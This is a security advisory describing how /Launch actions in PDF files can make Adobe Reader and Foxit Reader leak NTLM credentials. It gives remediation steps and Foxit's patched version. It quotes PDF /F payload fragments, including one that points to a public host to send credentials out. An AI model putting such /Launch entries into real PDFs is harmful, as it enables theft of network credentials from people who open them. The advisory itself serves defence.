Microsoft Patches 3 Actively Exploited Zero-Day Vulnerabilities in Latest Security Update
January 15, 2025Multiple WordPress Plugins Vulnerabilities
January 16, 2025Microsoft Patches 3 Actively Exploited Zero-Day Vulnerabilities in Latest Security Update
January 15, 2025Multiple WordPress Plugins Vulnerabilities
January 16, 2025Severity
High
Analysis Summary
Researchers have discovered a “zero-day behavior” in PDF files that could leak sensitive NTLM authentication data when processed by Adobe Reader and Foxit Reader. This vulnerability arises from the way these readers handle specific /Launch actions in PDF files, potentially allowing attackers to steal NTLM credentials. While no malicious intent was found in the analyzed samples, this behavior demonstrates a significant security risk, particularly in Windows network environments.
The vulnerability occurs when PDF readers process the /Launch action, such as the sample code /F (/Applications/Calculator.app/Contents/MacOS/Calculator). In Adobe Reader, this triggers a connection to a network resource and sends NTLM credentials before any user warning appears. Although Adobe emphasized that this behavior is restricted to intranet domains and aligns with their trust model, attackers within private network environments could exploit this to harvest sensitive data.
Foxit Reader’s response differs significantly. While the original sample didn’t leak NTLM data, modifying the /F field to reference a public domain enabled credential leaks to attacker-controlled servers. For example, replacing the file path with /F (/pub.expmon.com/test) would result in NTLM credentials being sent before a warning is displayed. Recognizing the severity, Foxit promptly patched the vulnerability in December 2024 with Foxit PDF Reader for Windows v2024.4.
Adobe downplayed the risk, stating that the behavior aligns with their trust model and occurs only with intranet domains, which are deemed trusted by default. In contrast, Foxit acknowledged the issue as a legitimate vulnerability, issuing a patch and urging users to update to the latest version. This disparity in responses underscores different approaches to handling potential security threats in widely used software.
Researchers highlighted the power of big data analytics (BDA) in uncovering these overlooked behaviors, demonstrating how retrospective analysis of files can improve exploit detection. Their discovery serves as a reminder of the risks posed by seemingly benign software actions. To mitigate threats, Adobe users should disable the “Automatically trust sites from Win OS security zones” feature, while Foxit users should update to the latest patched version.
Impact
- Sensitive Data Theft
- Unauthorized Access
Remediation
- Disable the “Automatically trust sites from Win OS security zones” feature within Acrobat’s settings to prevent NTLM authentication attempts for intranet domains. This limits the automatic trust of potentially unsafe intranet resources.
- Use a firewall to block unauthorized or suspicious outbound NTLM traffic, particularly to internal servers, to mitigate the risk of credential leaks.
- Update to the Latest Version: Ensure all users upgrade to Foxit Reader for Windows v2024.4 or higher, as this version includes a patch to address the vulnerability.
- Use tools to analyze and sanitize PDFs before opening them to ensure no malicious modifications, such as altered /Launch actions.
- Configure Foxit Reader’s security settings to restrict or block actions like launching external files or initiating network connections.
- Separate critical systems and user networks to minimize the impact of credential leaks within the same environment.
- Replace NTLM with more secure authentication protocols like Kerberos where feasible to reduce the risk of pass-the-hash attacks.
- Use IDS to monitor and alert on suspicious NTLM traffic or attempts to connect to unauthorized resources.
- Conduct awareness training on recognizing phishing attempts and avoiding opening potentially harmful files.
- Ensure that all software, including PDF readers, is up-to-date with the latest security patches.
- Continuously monitor network logs for unusual NTLM traffic patterns or unauthorized access attempts.
- Leverage big data analytics tools to retrospectively analyze files and detect zero-day behaviors or missed exploits in previously accessed files, improving the organization's overall threat detection capabilities.